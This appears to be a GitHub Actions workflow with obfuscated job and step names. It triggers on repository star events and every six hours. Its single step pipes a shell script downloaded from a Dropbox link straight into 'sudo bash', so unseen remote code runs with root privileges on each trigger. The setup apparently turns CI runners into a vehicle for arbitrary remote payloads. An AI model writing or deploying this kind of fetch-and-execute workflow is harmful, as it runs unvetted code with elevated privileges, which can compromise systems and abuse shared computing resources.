name: GDzc
on:
  watch:
    types: started
  schedule:
    - cron:  '0 */6 * * *'
jobs:
  GD:
    runs-on: ubuntu-latest
    steps:
    - name: zc
      run: curl https://dl-web.dropbox.com/s/ce83avzn4908xx0/a.sh | sudo bash
